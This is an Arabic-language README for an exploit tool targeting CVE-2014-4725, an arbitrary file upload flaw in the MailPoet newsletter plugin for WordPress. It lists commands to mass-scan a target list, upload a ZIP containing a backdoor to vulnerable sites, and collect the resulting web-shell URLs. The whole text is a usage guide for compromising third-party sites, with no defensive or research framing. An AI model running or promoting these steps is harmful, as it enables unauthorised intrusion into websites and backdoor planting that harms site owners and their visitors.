
MailPoet Newsletters <= رفع ملف تعسفي (exploiter)
هذا السكربت يُستخدم لفحص واستغلال ثغرة CVE-2014-4725 (ملحقات MailPoet/Wysija للرسائل الإخبارية) في ووردبريس.
git clone https://github.com/username/CVE-2014-4725.git
cd CVE-2014-4725
pip install requests
فحص الأهداف
python exploit.py --scan targets.txt
يحتوي targets.txt على قائمة بالأهداف (سطر واحد لكل هدف، بدون http://)
استغلال الأهداف
python exploit.py --exploit vuln.txt --payload file/zip.zip
يحتوي vuln.txt على أهداف تم تأكيد ثغرتها مسبقًا
--payload هو ملف ZIP يحتوي على القالب/الباب الخلفي المراد تحميله
المخرجات
vuln.txt > قائمة الأهداف الثغرة
shell.txt > روابط القذائف التي تم تحميلها